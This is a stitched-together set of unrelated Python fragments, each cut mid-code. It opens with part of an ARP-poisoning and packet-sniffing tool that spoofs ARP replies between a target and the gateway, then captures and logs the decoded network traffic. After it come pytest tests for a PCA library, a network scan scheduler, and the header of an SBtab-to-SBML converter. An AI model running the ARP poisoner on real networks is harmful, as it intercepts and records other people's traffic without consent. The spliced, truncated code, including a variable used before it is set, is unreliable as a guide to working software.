packet = ARP(op=2, pdst=targetip, psrc=sourceip, hwdst=targetmac)
send(packet, verbose=False)
def restore_arp(self, targetip, targetmac, sourceip, sourcemac):
packet = ARP(op=2, hwsrc=sourcemac, psrc=sourceip, hwdst=targetmac, pdst=targetip)
send(packet, verbose=False)
print(f"[+] ARP Table Restored For: {targetip}")
def arp_poison(self):
try:
self.gate_mac = self.obtain_macaddress(self.gate_ip)
print(f"[+] Gateway MAC: {self.gate_mac}")
except:
print(f"[+] Unable to Obtain MAC Address for {self.gate_ip}")
sys.exit()
try:
self.targ_mac = self.obtain_macaddress(self.targ_ip)
print(f"[+] Target MAC: {self.targ_mac}")
except:
print(f"[+] Unable to Obtain MAC Address for {self.targ_ip}")
sys.exit()
print("\n[+] Sending ARP-Poisoning Packets to Targets\n[+] Do CTRL+C To Stop Arp Poisoning.\n")
while True:
try:
self.send_arp_pkt(self.targ_ip, self.targ_mac, self.gate_ip)
self.send_arp_pkt(self.gate_ip, self.gate_mac, self.targ_ip)
except:
self.restore_arp(self.gate_ip, self.gate_mac, self.targ_ip, self.targ_mac)
self.restore_arp(self.targ_ip, self.targ_mac, self.gate_ip, self.gate_mac)
break
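# A minimal usage sketch for ARP_Poisoner, kept in comments so it never runs on
# import. The target and gateway IPs are hypothetical placeholders, not values
# taken from this script:
#
#   poisoner = ARP_Poisoner("192.168.0.42", "192.168.0.1")
#   poisoner.arp_poison()   # loops until CTRL+C, then restores both ARP tables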
class PacketSniffer:
def __init__(self, translate=False, raw=False, log=False, poison=None, address=None):
self.os = os.name
self.poison = poison
self.logger = bool(log)
self.translat = bool(translate)
self.address = address
self.raw = bool(raw)
self.hastarget = False
if self.address is not None:
try:
self.hastarget = True
self.targ_mac = ARP_Poisoner.obtain_macaddress(None, self.address)
print(f"[+] Obtained MAC Address of {self.address}: {self.targ_mac}")
except:
print(f"[+] Unable to Obtain MAC Address of {self.address}.")
print("[+] Check you arguements.")
sys.exit()
self.translationfile = ['ÿ ff', 'a 61', 'b 62', 'c 63', 'd 64', 'e 65', 'f 66', 'g 67', 'h 68', 'i 69', 'j 6a', 'k 6b', 'l 6c', 'm 6d', 'n 6e', 'o 6f', 'p 70', 'q 71', 'r 72', 's 73', 't 74', 'u 75', 'v 76', 'w 77', 'x 78', 'y 79', 'z 7a', 'A 41', 'B 42', 'C 43', 'D 44', 'E 45', 'F 46', 'G 47', 'H 48', 'I 49', 'J 4a', 'K 4b', 'L 4c', 'M 4d', 'N 4e', 'O 4f', 'P 50', 'Q 51', 'R 52', 'S 53', 'T 54', 'U 55', 'V 56', 'W 57', 'X 58', 'Y 59', 'Z 5a', '0 30', '1 31', '2 32', '3 33', '4 34', '5 35', '6 36', '7 37', '8 38', '9 39', 'ˆ 88', '. 00', 'þ fe', '¶ b6', 'ž 9e', 'Ñ d1', 'Ë cb', '@ 40', ': 3a',"' 27",'" 22', "/ 2f", '\\ 5c', '$ 24', '% 25', '^ 5e', '& 26', '* 2a', '( 28', ') 29', '[ 5b', '] 5d', '{ 7b', '} 7d', 'ù f9', '© a9', 'À c0', 'ª aa', '¾ be', 'Û db', 'Ç c7']
self.logfile = "captured_traffic.txt"
print(f"[+] All Traffic Will be Logged.\n[+] Log File: {self.logfile}")
if self.poison is not None:
self.arp_poison = ARP_Poisoner(self.poison, "192.168.0.1")
self.arp_poisoner = threading.Thread(target=self.arp_poison.arp_poison)
self.arp_poisoner.start()
if self.os == "nt":
try:
self.sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_IP)
self.sniffer.bind((socket.gethostbyname(socket.gethostname()), 0))
self.sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
self.sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
except:
print("[+] Error with binding socket.")
print("[+] Run this script as admin!")
sys.exit()
else:
self.sniffer = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800))
def eth_header(self, data):
storeobj = data
storeobj = struct.unpack("!6s6sH", storeobj)
destination_mac = binascii.hexlify(storeobj[0])
source_mac = binascii.hexlify(storeobj[1])
eth_protocol = storeobj[2]
dest_mac = ""
src_mac = ""
try:
item = 0
for i in source_mac.decode():
src_mac += i
item += 1
if item == 2:
item = 0
src_mac += ":"
item = 0
for i in destination_mac.decode():
dest_mac += i
item += 1
if item == 2:
item = 0
dest_mac += ":"
except:
pass
data = {"Source Mac": src_mac,
"Destination Mac": dest_mac,
"Protocol": eth_protocol}
return data
def ip_header(self, data):
storeobj = struct.unpack("!BBHHHBBH4s4s", data)
version = storeobj[0]
tos = storeobj[1]
total_length = storeobj[2]
identification = storeobj[3]
fragment_Offset = storeobj[4]
ttl = storeobj[5]
protocol = storeobj[6]
header_checksum = storeobj[7]
source_address = socket.inet_ntoa(storeobj[8])
destination_address = socket.inet_ntoa(storeobj[9])
data = {'Version': version,
"Tos": tos,
"Total Length": total_length,
"Identification": identification,
"Fragment": fragment_Offset,
"TTL": ttl,
"Protocol": protocol,
"Header CheckSum": header_checksum,
"Source Address": source_address,
"Destination Address": destination_address}
return data
def tcp_header(self, data):
storeobj = struct.unpack('!HHLLBBHHH', data)
source_port = storeobj[0]
destination_port = storeobj[1]
sequence_number = storeobj[2]
acknowledge_number = storeobj[3]
offset_reserved = storeobj[4]
tcp_flag = storeobj[5]
window = storeobj[6]
checksum = storeobj[7]
urgent_pointer = storeobj[8]
data = {"Source Port": source_port,
"Destination Port": destination_port,
"Sequence Number": sequence_number,
"Acknowledge Number": acknowledge_number,
"Offset & Reserved": offset_reserved,
"TCP Flag": tcp_flag,
"Window": window,
"CheckSum": checksum,
"Urgent Pointer": urgent_pointer
}
return data
def translatebyte(self, byte):
result = ""
flag = 0
for i in self.translationfile:
if byte in i:
i = i.split()
flag = 1
return i[0]
if flag == 0:
return "."
def translate(self, datas, src_ip, dst_ip):
result = ""
split_data = ""
item = 0
for i in datas:
split_data += i
item += 1
if item == 2:
split_data += " "
item = 0
for data in split_data.split():
add = self.translatebyte(data)
result += add
if self.raw:
print(f"\n[+]: Raw Network Traffic:")
print(f" {split_data}")
self.log(f"\n[(RAW)({src_ip})---->({dst_ip})]: {split_data}\n[(DECODED)({src_ip})---->({dst_ip})]: {result}")
return result
def log(self, item):
try:
file = open(self.logfile,"r")
contents = file.read()
file.close()
except:
pass
file = open(self.logfile,"w")
try:
file.write(contents)
except:
pass
file.write(item)
file.close()
def sniffing(self):
while True:
try:
if self.hastarget:
desired_target = False
pkt = self.sniffer.recvfrom(65565)
self.log(f"\n\n[(RECV)] Raw Packets Received: {pkt}")
if self.raw:
print(f"\n[+] Raw Packets Recieved: {pkt}")
if self.logger:
self.log(msg)
for i in self.eth_header(pkt[0][0:14]).items():
a, b = i
if desired_target:
print(f"[+] {a} | {b}")
if self.targ_mac in b:
msg = "\n[+] Ethernet Header:"
print(msg)
print(f"[+] {a} | {b}")
desired_target = True
else:
break
if self.logger:
self.log(f"\n[+] {a} | {b}")
if desired_target:
msg = "\n[+] IP Header:"
print(msg)
if self.logger:
self.log(msg)
for i in self.ip_header(pkt[0][14:34]).items():
a, b = i
print(f"[+] {a} | {b}")
if "Source Address" in a.strip():
src_ip = b
if "Destination Address" in a.strip():
dst_ip = b
if self.logger:
self.log(f"\n[+] {a} | {b}")
msg = "\n[+] TCP Header:"
print(msg)
if self.logger:
self.log(msg)
for i in self.tcp_header(pkt[0][34:54]).items():
a, b = i
print(f"[+] {a} | {b}")
if self.logger:
self.log(f"\n[+] {a} | {b}")
if self.translat:
try:
translation = self.translate(binascii.hexlify(pkt[0]).decode(), src_ip, dst_ip)
print(
"\n[+] Translation Of Network Traffic(gibberish most likely means encrypted traffic):")
print(" ", translation)
except Exception as e:
print("[+] Error with translation.")
else:
translation = self.translate(binascii.hexlify(pkt[0]).decode(), src_ip, dst_ip)
else:
pkt = self.sniffer.recvfrom(65565)
self.log(f"\n\n[(RECV)] Raw Packets Received: {pkt}")
# (c) <NAME>, 2010-2022. MIT License.
import pathlib
import numpy as np
import pandas as pd
import pytest
from pytest import approx
from sklearn.cross_decomposition import PLSRegression
from process_improve.multivariate.methods import (
PCA,
PLS,
MCUVScaler,
SpecificationWarning,
center,
epsqrt,
quick_regress,
scale,
ssq,
)
def test_PCA_SPE_limits():
"""
Simulate data and see if SPE limit cuts off at 5%.
"""
N = 1000
repeats = 50
outliers_95 = []
outliers_99 = []
for k in range(repeats):
# The desired mean values of the sample.
mu = np.array([0.0, 0.0, 0.0])
# The desired covariance matrix.
r = np.array([[5.20, -4.98, -1.00], [-4.98, 5.50, 2.94], [-1.00, 2.94, 2.77]])
X = pd.DataFrame(np.random.multivariate_normal(mu, r, size=N))
scaler = MCUVScaler().fit(X)
mcuv = scaler.fit_transform(X)
A = 2
pca = PCA(n_components=A).fit(mcuv)
SPE_limit_95 = pca.SPE_limit(0.95)
SPE_limit_99 = pca.SPE_limit(0.99)
outliers_95.append(
(pca.squared_prediction_error.iloc[:, A - 1] > SPE_limit_95).sum()
)
outliers_99.append(
(pca.squared_prediction_error.iloc[:, A - 1] > SPE_limit_99).sum()
)
assert np.mean(outliers_95) == approx(0.05 * N, rel=0.1)
assert np.mean(outliers_99) == approx(0.01 * N, rel=0.1)
def test_PCA_foods():
"""
Checks the PCA model of the food-texture dataset against known values (R2, T2 limit, score ellipse).
"""
foods = pd.read_csv("https://openmv.net/file/food-texture.csv").drop(
[
"Unnamed: 0",
],
axis=1,
)
scaler = MCUVScaler().fit(foods)
foods_mcuv = scaler.fit_transform(foods)
A = 2
pca = PCA(n_components=A).fit(foods_mcuv)
assert np.linalg.norm(
np.diag(pca.x_scores.T @ pca.x_scores) / (pca.N - 1) - pca.explained_variance_
) == approx(0, abs=epsqrt)
T2_limit_95 = pca.T2_limit(0.95)
assert T2_limit_95 == approx(6.64469, rel=1e-3)
pca.SPE_limit(0.95)
ellipse_x, ellipse_y = pca.ellipse_coordinates(1, 2, 0.95, 100)
assert ellipse_x[-1] == approx(4.48792, rel=1e-5)
assert ellipse_y[-1] == approx(0, rel=1e-7)
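# For reference, the call pattern exercised above in one place (a sketch; any
# numeric DataFrame can stand in for the foods data):
#
#   X_mcuv = MCUVScaler().fit_transform(foods)
#   pca = PCA(n_components=2).fit(X_mcuv)
#   t2_95, spe_95 = pca.T2_limit(0.95), pca.SPE_limit(0.95)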
@pytest.fixture
def fixture_kamyr_data_missing_value():
folder = (
pathlib.Path(__file__).parents[1]
/ "process_improve"
/ "datasets"
/ "multivariate"
)
return pd.read_csv(
folder / "kamyr.csv",
index_col=None,
header=None,
)
def test_PCA_missing_data(fixture_kamyr_data_missing_value):
X_mcuv = MCUVScaler().fit_transform(fixture_kamyr_data_missing_value)
# Build the model
A = 2
pca = PCA(n_components=A)
assert pca.missing_data_settings is None
# Check that default missing data options were used
model = pca.fit(X_mcuv)
assert isinstance(model.missing_data_settings, dict)
assert "md_tol" in model.missing_data_settings
assert np.linalg.norm(
(model.loadings.T @ model.loadings) - np.eye(model.A)
) == approx(0, abs=1e-2)
def test_PCA_missing_data_as_numpy(fixture_kamyr_data_missing_value):
X_mcuv = MCUVScaler().fit_transform(fixture_kamyr_data_missing_value.values)
# Build the model
A = 2
pca = PCA(n_components=A)
assert pca.missing_data_settings is None
# Check that default missing data options were used
model = pca.fit(X_mcuv)
assert isinstance(model.missing_data_settings, dict)
assert "md_tol" in model.missing_data_settings
assert np.linalg.norm(
(model.loadings.T @ model.loadings) - np.eye(model.A)
) == approx(0, abs=1e-2)
@pytest.fixture
def fixture_mv_utilities():
"""
Multivariate methods depend on internal regression and sum-of-squares
calculations. This code tests those crucial steps.
"""
x = np.asarray([1, 2, 3, 4, 5, 6]).reshape(6, 1)
Y = np.asarray(
[
[1, 2, 3, 4, 5, 6],
[6, 5, 4, 3, 2, 1],
[0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, np.NaN, 3, np.NaN, 5, np.NaN],
]
)
Y = Y.T
return x, Y
def test_ssq(fixture_mv_utilities):
x, _ = fixture_mv_utilities
assert (1 + 2 * 2 + 3 * 3 + 4 * 4 + 5 * 5 + 6 * 6) == approx(ssq(x), abs=1e-9)
def test_quick_regress(fixture_mv_utilities):
x, Y = fixture_mv_utilities
out = quick_regress(Y, x).ravel()
assert 1 == approx(out[0], abs=1e-9)
assert 0.61538462 == approx(out[1], abs=1e-8)
assert 0 == approx(out[2], abs=1e-9)
# Checked against R: summary(lm(c(1,1,1,1,1,1) ~ seq(6) + 0))
assert 0.23077 == approx(out[3], abs=1e-6)
# Checked against what is expected: (1 + 3^2 + 5^2)/(1 + 3^2 + 5^2)
assert 1.0 == approx(out[4], abs=1e-14)
@pytest.fixture
def fixture_tablet_spectra_data():
"""
Verifies the PCA model for the case of no missing data.
# R code:
# -------
# Read large data file
file <- 'http://openmv.net/file/tablet-spectra.csv'
spectra <- read.csv(file, header = FALSE, row.names = 1)
# Only extract 4 components, but
# center and scale the data before
# calculation the components
model.pca <- prcomp(spectra,
center = TRUE,
scale =TRUE,
rank. = 4)
summary(model.pca)
Importance of first k=4 (out of 460) components:
PC1 PC2 PC3 PC4
Standard deviation 21.8835 10.9748 3.60075 3.27081
Proportion of Variance 0.7368 0.1853 0.01995 0.01646
Cumulative Proportion 0.7368 0.9221 0.94200 0.95846
# T' * T on the scores matrix T:
t(model.pca$x) %*% model.pca$x
PC1 PC2 PC3 PC4
PC1 2.198092e+05 6.885159e-11 -1.134026e-11 3.454659e-11
PC2 6.885159e-11 5.528459e+04 2.042206e-10 5.821477e-11
PC3 -1.134026e-11 2.042206e-10 5.951125e+03 7.815970e-13
PC4 3.454659e-11 5.821477e-11 7.815970e-13 4.910481e+03
"""
folder = (
pathlib.Path(__file__).parents[1]
/ "process_improve"
/ "datasets"
/ "multivariate"
)
spectra = pd.read_csv(
folder / "tablet-spectra.csv",
index_col=0,
header=None,
)
# Ignoring values < 1E-8 (round them to zero) from the R output above.
known_scores_covar = np.array(
[
[2.198092e05, 0, 0, 0],
[0, 5.528459e04, 0, 0],
[0, 0, 5.951125e03, 0],
[0, 0, 0, 4.910481e03],
]
)
return spectra, known_scores_covar
def test_MCUV_centering(fixture_tablet_spectra_data):
"""
Mean centering of the testing data.
"""
spectra, _ = fixture_tablet_spectra_data
X_mcuv = MCUVScaler().fit_transform(spectra)
assert 0.0 == approx(np.max(np.abs(X_mcuv.mean(axis=0))), rel=1e-9)
def test_MCUV_scaling(fixture_tablet_spectra_data):
"""Scaling by standard deviation."""
spectra, _ = fixture_tablet_spectra_data
X_mcuv = MCUVScaler().fit_transform(spectra)
assert 1 == approx(np.min(np.abs(X_mcuv.std(axis=0))), 1e-10)
assert 1 == approx(X_mcuv.std(), 1e-10)
def test_PCA_tablet_spectra(fixture_tablet_spectra_data):
r"""
PCA characteristics:
1. model's loadings must be orthogonal if there are no missing data.
P.T * P = I
2. model's loadings must be of unit length (norm = 1.0)
P.T * P = I
3. model's scores must be orthogonal
T.T * T is a diagonal matrix when there's no missing data
4. each earlier score's variance must be >= variance of later score
PCA models have the following properties:
* :math:`p_i'p_j' = 0` for :math:`i\neq j`; i.e. :math:`p_i \perp p_j`
* :math:`t_i't_j' = 0` for :math:`i\neq j`; i.e. :math:`t_i \perp t_j`
* :math:`P'P = I_A` when extracting :math:`A` components
* :math:`P_{all} \text{ is a } \min(N,K) \times \min(N,K)` matrix, for all components
* :math:`T_{all} \text{ is a } \min(N,K) \times \min(N,K)` matrix, for all components
(it is just a rearrangement of X)
* :math:`\text{SVD}(X): UDV' = X` and :math:`V' = P'` and :math:`UD = T`
"""
spectra, known_scores_covar = fixture_tablet_spectra_data
# Number of components to calculate
model = PCA(n_components=2)
model.fit(scale(center(spectra)))
# P'P = identity matrix of size A x A
orthogonal_check = model.loadings.T @ model.loadings
assert 0.0 == approx(np.linalg.norm(orthogonal_check - np.eye(model.A)), rel=1e-9)
# Check the R2 value against the R software output
assert model.R2cum[1] == approx(0.7368, rel=1e-3)
assert model.R2cum[2] == approx(0.9221, rel=1e-2)
# Unit length: actually checked above, via subtraction with I matrix.
# Check if scores are orthogonal
scores_covar = model.x_scores.T @ model.x_scores
for i in range(model.A):
for j in range(model.A):
# Technically not needed, but more explicit this way.
if i == j:
assert scores_covar.iloc[i, j] == approx(
known_scores_covar[i, j], rel=1e-2
)
else:
assert scores_covar.iloc[i, j] == approx(
known_scores_covar[i, j], abs=1e-4
)
if i >= 1:
assert scores_covar.iloc[j, j] > scores_covar.iloc[i, i]
# Check the model against an SVD: this raw data set has no missing
# data, so the SVD should be faster and more accurate than NIPALS
autoscaled_X = scale(center(spectra))
u, s, v = np.linalg.svd(autoscaled_X)
loadings_delta = np.linalg.norm(
np.abs(v[0 : model.A, :]) - np.abs(model.loadings.T)
)
assert loadings_delta == approx(0, abs=1e-8)
# It is not possible, it seems, to get the scores to match the SVD
# scores. Numerical error?
def test_PCA_errors_no_variance_to_start():
"""
Arrays with no variance should seem to work, but should have no variability explained.
"""
K, N, A = 17, 12, 5
data = pd.DataFrame(np.zeros((N, K)))
model = PCA(n_components=A)
# with pytest.raises(RuntimeError):
model.fit(data)
assert np.sum(model.x_scores.values) == approx(0, abs=epsqrt)
assert model.R2cum.sum() == approx(0, abs=epsqrt)
assert np.isnan(model.R2cum[A - 1])
def test_PCA_invalid_calls():
"""
Tests various invalid calls, and corresponding error messages.
"""
K, N, A = 4, 3, 5
data = pd.DataFrame(np.random.uniform(low=-1, high=1, size=(N, K)))
with pytest.warns(
SpecificationWarning,
match=r"The requested number of components is more than can be computed from data(.*)",
):
model = PCA(n_components=A)
model.fit(data)
data.iloc[0, 0] = np.nan
with pytest.raises(AssertionError, match="Tolerance must exceed machine precision"):
_ = PCA(
n_components=A, missing_data_settings=dict(md_method="nipals", md_tol=0)
).fit(data)
with pytest.raises(
AssertionError, match=r"Missing data method is not recognized(.*)"
):
_ = PCA(n_components=A, missing_data_settings={"md_method": "SCP"}).fit(data)
# TODO: replace with a check to ensure the data is in a DataFrame.
# from scipy.sparse import csr_matrix
# sparse_data = csr_matrix([[1, 2, 0], [0, 0, 3], [4, 0, 5]])
# with pytest.raises(TypeError, match="This PCA class does not support sparse input."):
# model = PCA(n_components=2)
# model.fit(sparse_data)
def test_PCA_no_more_variance():
"""
Create a rank 2 matrix and it should fail on the 3rd component.
"""
K = 17
N = 12
A = 3
T =
#!/usr/bin/env python3
# Copyright 2004-present Facebook. All Rights Reserved.
import asyncio
import logging
import time
from contextlib import suppress
from datetime import datetime
from enum import Enum
from typing import Dict, Iterable, NoReturn, Optional, Tuple
from croniter import croniter
from sqlalchemy import delete, func, insert, join, select, update
from tglib.clients import MySQLClient
from .models import (
ConnectivityResults,
InterferenceResults,
ScanMode,
ScanResults,
ScanTestExecution,
ScanTestParams,
ScanTestSchedule,
ScanTestStatus,
ScanType,
)
from .scan import ScanTest
from .utils.alerts import Alerts, Severity
class Schedule:
def __init__(self, enabled: bool, cron_expr: str) -> None:
self.enabled = enabled
self.cron_expr = cron_expr
self.task: Optional[asyncio.Task] = None
async def start(self, test: ScanTest, params_id: int) -> NoReturn:
"""Start the schedule task.
Loops forever and tries to start a new scan execution when the cron
expression is evaluated.
"""
iter = croniter(self.cron_expr, datetime.now())
while True:
logging.info(
f"{test.type.name} scan is scheduled for "
f"{iter.get_next(datetime)} on {test.network_name}"
)
# Sleep until it is time to run
await asyncio.sleep(iter.get_current() - time.time())
# Skip if the schedule is disabled
if not self.enabled:
logging.info("Schedule is currently disabled, skipping...")
continue
# Start the scan
await Scheduler.start_execution(test, params_id)
async def stop(self) -> bool:
"""Stop the schedule task.
Cancel the task and await the result.
"""
# Cancel the task
if self.task is None or not self.task.cancel():
return False
with suppress(asyncio.CancelledError):
await self.task
return True
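# A rough usage sketch (must run inside an event loop; the network name and the
# ScanType/ScanMode members used here are illustrative assumptions, not values
# defined in this module):
#
#   test = ScanTest("example_network", ScanType.IM, ScanMode.FINE, {})
#   schedule = Schedule(enabled=True, cron_expr="0 2 * * *")
#   schedule_id = await Scheduler.add_schedule(schedule, test)
#   await Scheduler.delete_schedule(schedule_id)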
class Scheduler:
_schedules: Dict[int, Schedule] = {}
executions: Dict[int, ScanTest] = {}
SCAN_START_DELAY_S = 5
CLEAN_UP_DELAY_S = 60
@classmethod
def has_schedule(cls, schedule_id: int) -> bool:
"""Verify that a schedule_id belongs to a running schedule."""
return schedule_id in cls._schedules
@classmethod
def get_execution(
cls, token: int, network_name: str
) -> Optional[Tuple[int, ScanTest]]:
"""Get the test execution and ID for a particular scan token."""
for id, execution in cls.executions.items():
if execution.network_name == network_name and token in range(
execution.start_token, execution.end_token + 1 # type: ignore
):
return id, execution
return None
@classmethod
async def restart(cls) -> None:
"""Mark all stale running executions as FAILED and restart the schedules."""
async with MySQLClient().lease() as sa_conn:
update_execution_query = (
update(ScanTestExecution)
.where(
(ScanTestExecution.status == ScanTestStatus.QUEUED)
| (ScanTestExecution.status == ScanTestStatus.RUNNING)
)
.values(status=ScanTestStatus.FAILED, end_dt=datetime.utcnow())
)
await sa_conn.execute(update_execution_query)
await sa_conn.connection.commit()
# Start all of the schedules in the DB
for row in await cls.list_schedules():
test = ScanTest(row.network_name, row.type, row.mode, row.options)
schedule = Schedule(row.enabled, row.cron_expr)
cls._schedules[row.id] = schedule
schedule.task = asyncio.create_task(schedule.start(test, row.params_id))
@classmethod
async def add_schedule(cls, schedule: Schedule, test: ScanTest) -> int:
"""Add a new schedule to the DB and start the internal task."""
async with MySQLClient().lease() as sa_conn:
insert_schedule_query = insert(ScanTestSchedule).values(
enabled=schedule.enabled, cron_expr=schedule.cron_expr
)
schedule_row = await sa_conn.execute(insert_schedule_query)
schedule_id: int = schedule_row.lastrowid
insert_params_query = insert(ScanTestParams).values(
schedule_id=schedule_id,
network_name=test.network_name,
type=test.type,
mode=test.mode,
options=test.options,
)
params_row = await sa_conn.execute(insert_params_query)
params_id = params_row.lastrowid
await sa_conn.connection.commit()
cls._schedules[schedule_id] = schedule
schedule.task = asyncio.create_task(schedule.start(test, params_id))
return schedule_id
@classmethod
async def modify_schedule(
cls, schedule_id: int, schedule: Schedule, test: ScanTest
) -> bool:
"""Stop the running schedule, update the DB, and restart."""
async with MySQLClient().lease() as sa_conn:
update_schedule_query = (
update(ScanTestSchedule)
.where(ScanTestSchedule.id == schedule_id)
.values(enabled=schedule.enabled, cron_expr=schedule.cron_expr)
)
await sa_conn.execute(update_schedule_query)
get_params_query = (
select([ScanTestParams])
.where(ScanTestParams.schedule_id == schedule_id)
.order_by(ScanTestParams.id.desc())
.limit(1)
)
cursor = await sa_conn.execute(get_params_query)
params_row = await cursor.first()
params_id = params_row.id
# Insert new params row if the values differ
if not (
params_row.network_name == test.network_name
and params_row.type == test.type
and params_row.mode == test.mode
and params_row.options == test.options
):
insert_params_query = insert(ScanTestParams).values(
schedule_id=schedule_id,
network_name=test.network_name,
type=test.type,
mode=test.mode,
options=test.options,
)
params_row = await sa_conn.execute(insert_params_query)
params_id = params_row.lastrowid
await sa_conn.connection.commit()
# Stop the existing schedule
prev_schedule = cls._schedules[schedule_id]
if not await prev_schedule.stop():
return False
# Start the new schedule
cls._schedules[schedule_id] = schedule
schedule.task = asyncio.create_task(schedule.start(test, params_id))
return True
@classmethod
async def delete_schedule(cls, schedule_id: int) -> bool:
"""Stop the schedule and delete the entry from the DB."""
async with MySQLClient().lease() as sa_conn:
query = delete(ScanTestSchedule).where(ScanTestSchedule.id == schedule_id)
await sa_conn.execute(query)
await sa_conn.connection.commit()
schedule = cls._schedules[schedule_id]
if not await schedule.stop():
return False
del cls._schedules[schedule_id]
return True
@classmethod
async def start_execution(
cls, test: ScanTest, params_id: Optional[int] = None
) -> Optional[int]:
"""Add a new execution to the DB and start the internal task."""
async with MySQLClient().lease() as sa_conn:
if params_id is None:
insert_params_query = insert(ScanTestParams).values(
network_name=test.network_name,
type=test.type,
mode=test.mode,
options=test.options,
)
params_row = await sa_conn.execute(insert_params_query)
params_id = params_row.lastrowid
insert_execution_query = insert(ScanTestExecution).values(
params_id=params_id, status=ScanTestStatus.QUEUED
)
execution_row = await sa_conn.execute(insert_execution_query)
execution_id: int = execution_row.lastrowid
await sa_conn.connection.commit()
# Start the test
await test.start(execution_id, cls.SCAN_START_DELAY_S)
if test.start_delay_s is None or test.end_delay_s is None:
await Alerts.post(
execution_id,
f"Scan test for execution id {execution_id} failed to start.",
Severity.CRITICAL,
)
return None
cls.executions[execution_id] = test
await Alerts.post(
execution_id,
f"Successfully started scan test with execution id {execution_id}.",
Severity.INFO,
test.start_delay_s,
test.end_delay_s + cls.CLEAN_UP_DELAY_S,
)
# Schedule task for updating execution status to RUNNING
loop = asyncio.get_event_loop()
loop.call_later(
test.start_delay_s,
asyncio.create_task,
cls.update_execution_status(execution_id, ScanTestStatus.RUNNING),
)
# Schedule task to clean up the execution status (FINISHED or FAILED)
loop.call_later(
test.end_delay_s + cls.CLEAN_UP_DELAY_S,
asyncio.create_task,
cls.cleanup_execution_status(test, execution_id),
)
return execution_id
@classmethod
async def cleanup_execution_status(cls, test: ScanTest, execution_id: int) -> None:
"""Mark the execution as FINISHED if we receive atleast one scan response.
If we do not receive any scan responses, mark the test as FAILED & send alert.
"""
async with MySQLClient().lease() as sa_conn:
get_execution_query = select([ScanTestExecution.status]).where(
ScanTestExecution.id == execution_id
)
cursor = await sa_conn.execute(get_execution_query)
execution_row = await cursor.first()
if execution_row and execution_row.status == ScanTestStatus.FINISHED:
return None
status = (
ScanTestStatus.FAILED
if test.token_count == len(test.token_range)
else ScanTestStatus.FINISHED
)
await cls.update_execution_status(execution_id, status, datetime.utcnow())
if status == ScanTestStatus.FAILED:
await Alerts.post(
execution_id,
f"Scan test for execution id {execution_id} failed. "
"Did not receive any scan responses.",
Severity.CRITICAL,
)
@classmethod
async def update_execution_status(
cls, execution_id: int, status: Enum, end_dt: Optional[datetime] = None
) -> None:
"""Update status of scan execution."""
logging.info(f"Updating execution status for id {execution_id} to {status}")
async with MySQLClient().lease() as sa_conn:
update_execution_query = (
update(ScanTestExecution)
.where(ScanTestExecution.id == execution_id)
.values(status=status, end_dt=end_dt)
)
await sa_conn.execute(update_execution_query)
await sa_conn.connection.commit()
@staticmethod
async def describe_schedule(
schedule_id: int,
) -> Optional[Tuple[Iterable, Iterable]]:
"""Fetch a particular schedule and its execution history given the ID."""
async with MySQLClient().lease() as sa_conn:
get_schedule_query = select([ScanTestSchedule]).where(
ScanTestSchedule.id == schedule_id
)
cursor = await sa_conn.execute(get_schedule_query)
schedule = await cursor.first()
if not schedule:
return None
get_executions_query = select(
[
ScanTestParams.network_name,
ScanTestParams.type,
ScanTestParams.mode,
ScanTestParams.options,
ScanTestExecution,
]
).select_from(
join(
join(
ScanTestParams,
ScanTestSchedule,
ScanTestParams.schedule_id == ScanTestSchedule.id,
),
ScanTestExecution,
ScanTestExecution.params_id == ScanTestParams.id,
)
)
cursor = await sa_conn.execute(get_executions_query)
return schedule, await cursor.fetchall()
@staticmethod
async def list_schedules(
network_name: Optional[str] = None,
type: Optional[ScanType] = None,
mode: Optional[ScanMode] = None,
) -> Iterable:
"""Fetch all the schedules, or a subset, with optional filtering."""
async with MySQLClient().lease() as sa_conn:
query = (
select(
[
ScanTestSchedule,
ScanTestParams.id.label("params_id"),
ScanTestParams.network_name,
ScanTestParams.type,
ScanTestParams.mode,
ScanTestParams.options,
]
)
.select_from(
join(
ScanTestParams,
ScanTestSchedule,
ScanTestParams.schedule_id == ScanTestSchedule.id,
)
)
.where(
ScanTestParams.id.in_(
select([func.max(ScanTestParams.id)]).group_by(
ScanTestParams.schedule_id
)
)
)
)
# Add filter conditions
if network_name is not None:
query = query.where(ScanTestParams.network_name == network_name)
if type is not None:
query = query.where(ScanTestParams.type == type)
if mode is not None:
query = query.where(ScanTestParams.mode == mode)
cursor = await sa_conn.execute(query)
schedules: Iterable = await cursor.fetchall()
return schedules
@staticmethod
async def describe_execution(
execution_id: int,
) -> Optional[Tuple[Iterable, Iterable, Iterable, Iterable]]:
"""Fetch a particular execution given the ID."""
async with MySQLClient().lease() as sa_conn:
get_execution_query = (
select(
[
ScanTestExecution,
ScanTestParams.network_name,
ScanTestParams.type,
ScanTestParams.mode,
ScanTestParams.options,
]
)
.select_from(
join(
ScanTestExecution,
ScanTestParams,
ScanTestExecution.params_id == ScanTestParams.id,
)
)
.where(ScanTestExecution.id == execution_id)
)
cursor = await sa_conn.execute(get_execution_query)
execution = await cursor.first()
if not execution:
return None
ignore_cols = {"id", "execution_id", "type", "mode", "results_path"}
get_results_query = select(
filter(
lambda col: col.key not in ignore_cols,
ScanResults.__table__.columns,
)
).where(ScanResults.execution_id == execution_id)
cursor = await sa_conn.execute(get_results_query)
results = await cursor.fetchall()
get_connectivity_results_query = select(
filter(
lambda col: col.key not in ignore_cols,
ConnectivityResults.__table__.columns,
)
).where(ConnectivityResults.execution_id == execution_id)
cursor = await sa_conn.execute(get_connectivity_results_query)
connectivity_results = await cursor.fetchall()
get_interference_results_query = select(
filter(
lambda col: col.key not in ignore_cols,
InterferenceResults.__table__.columns,
)
).where(InterferenceResults.execution_id == execution_id)
cursor = await sa_conn.execute(get_interference_results_query)
return execution, results, connectivity_results, await cursor.fetchall()
@staticmethod
async def list_executions(
network_name: Optional[str] = None,
type: Optional[ScanType] = None,
mode: Optional[ScanMode] = None,
status: Optional[ScanTestStatus] = None,
start_dt: Optional[datetime] = None,
) -> Iterable:
"""Fetch all the executions, or a subset, with optional filtering."""
async with MySQLClient().lease() as sa_conn:
"""
SBtab2SBML
==========
Python script that converts SBtab file/s to SBML.
"""
#!/usr/bin/env python
import re, libsbml
import SBtab
import string
import random
import sys
#all allowed SBtab types
